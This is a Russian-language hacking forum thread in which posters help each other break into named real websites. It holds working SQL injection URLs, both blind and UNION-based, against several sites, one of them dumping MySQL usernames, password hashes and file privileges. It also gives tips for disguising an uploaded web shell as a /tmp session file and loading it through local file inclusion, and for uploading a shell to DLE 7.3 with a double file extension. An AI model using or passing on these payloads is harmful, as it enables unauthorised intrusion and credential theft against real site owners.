скопирует в текущий каталог если хотите в другое место, можно использовать абсолютный путь который начинается с "/" ну или относительный "../../dir1/shell"
Проще тогда скопировать в /tmp/sess_26ac3fa833f07595698de0e73b8fa113. Есть несколько плюсов: 1) 99% есть права на запись в диру 2) меньше палева, файл маскируется под сессию, и сидит там молча. =) Потом инклудишь его index.php?page=/tmp/sess_26ac3fa833f07595698de0e73b8fa113 а потом уже перезаливаешь нормальный куда тебе нравится.
http://www.inderscience.com/browse/index.php?journalID=114' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38 Query Error: SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 что можно сделать? надеюсь я не ошибся темой)
Крутить как слепую... Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше... пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно. Т.е. первый ascii символ равен 52, значит версия мускуля 4-я. Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3
Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы? Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач.
К чему такие громоздкие конструкции? Code: http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1,1)=4/* Этого достаточно...
достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку, http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17. Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* но ничего не выводит. Пытался определить версию, методом, которым вы меня научили: http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))%3E=52,1,0)/* ответ таков: Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ Как дальше действовать?
http://www.broowaha.com/profile.php?id=-2434+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17/*
Code: http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(file_priv,0x3a,user,0x3a,password))),5,unhex(hex(concat(version(),0x3a,user(),0x3a,database()))),7+from+mysql.user-- nemaniak, fraIzer не стоит торопиться с выводами.
Вопрос: есть бажный PHP-скрипт, который использует значение переменной HTTP_HOST при генерации XML (то есть в самом XML это значение используется без какого-либо экранирования спец. символов) и потом его отдаёт на скачивание. Что можно провернуть в данном случае? Да, мы можем варьировать HTTP Host заголовком..но что это нам даёт?
если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
Речь шла о конкретной скуле!!! Ты же показываешь совершенно другую!!! Опять же на протяжении всего поста ты показывал ему как узнать версию, я и подмитил, что не к чему использовать такие громоздкие конструкции при определении версии(это не оправдывает себя), вот когда названия таблиц и столбцов подбирать начнешь, тогда да, но это совершенно другой вопрос, так или иначе то, что ты ему объяснил, это как вилами по воде, надеюсь понимаешь о чём я.
Только в случае, если виртуальные хосты host-based. Уязвимость имеет место, то есть скрипт исполняется и в теле XML фигурирует значение Host-заголовка.
нашел скулю но там какая-та фильтрация смотрим видим 1 юзера http://playthegame.od.ua/index.php?action=9&showuser=3058 видем юзера под ид 3057 http://playthegame.od.ua/index.php?action=9&showuser=3058-1 если делаем так то видим ошибку http://extremission.com.ua/index.php?action=8 но при попытки http://playthegame.od.ua/index.php?action=9&showuser=3058 дописать что-то типо union select и т.п. ничего не получаеться.... есть идеи*?
я тебе сказал крутить как слепую твой прошлый пример, т.к. именно в том параметре я других вариантов не видел, это не значит, что так надо крутить все скули. Нафига тебе эти сложности, если эту можно раскрутить как обычную, т.е. как написал попугай. Ну это уже конкретика, естественно, что у каждого свои трики, которыми он пользуется, для меня лично легче сразу написать всю конструкцию с ascii(), а потом поменять version() например на user(), чем писать сначала без ascii() а потом ее дописывать... а вообще это все хрень, так все равно никто вручную все базы, столбцы, данные и т.д. перебирать не будет...
.php перед flv убирается движком.. Удалось залить файл ......../uploads/files/1250379992_functions.phtml.flv но он не интрепретируется, а скачивается... Какие ещё есть варианты залить шел через движок дле 7.3 версии?